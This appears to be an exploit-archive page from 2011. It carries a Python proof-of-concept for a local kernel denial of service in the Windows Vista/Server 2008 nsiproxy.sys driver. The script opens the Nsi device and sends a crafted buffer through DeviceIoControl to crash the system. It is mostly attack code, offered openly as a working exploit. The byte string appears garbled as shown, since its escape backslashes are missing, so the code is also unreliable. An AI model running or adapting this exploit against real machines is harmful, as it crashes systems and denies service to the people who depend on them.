Home / exploits Microsoft Windows Vista/Server 2008 nsiproxy.sys Denial Of S
Posted on 18 May 2011
#!/usr/bin/python ############################################################################ ## ## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit ## Author: Lufeng Li of Neusoft Corporation ## Vendor: www.microsoft.com ## Vulnerable: Windows Vista/Server 2008 ## ############################################################################ from ctypes import * kernel32 = windll.kernel32 Psapi = windll.Psapi if __name__ == '__main__': GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 CREATE_ALWAYS = 0x2 SYM_NAME = "\\.\Nsi" dwReturn = c_ulong() out_buff = '' in_buff = ("x00x00x00x00x00x00x00x00xecx2dx39x6ex07x00x00x00" "x01x00x00x00x00x00x00x00x38x89x6cx01x08x00x00x00" "x00x00x00x00x00x00x00x00x10xfax78x00x28x00x00x00" "x38xfax78x00x0cx00x00x00") handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None) dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)
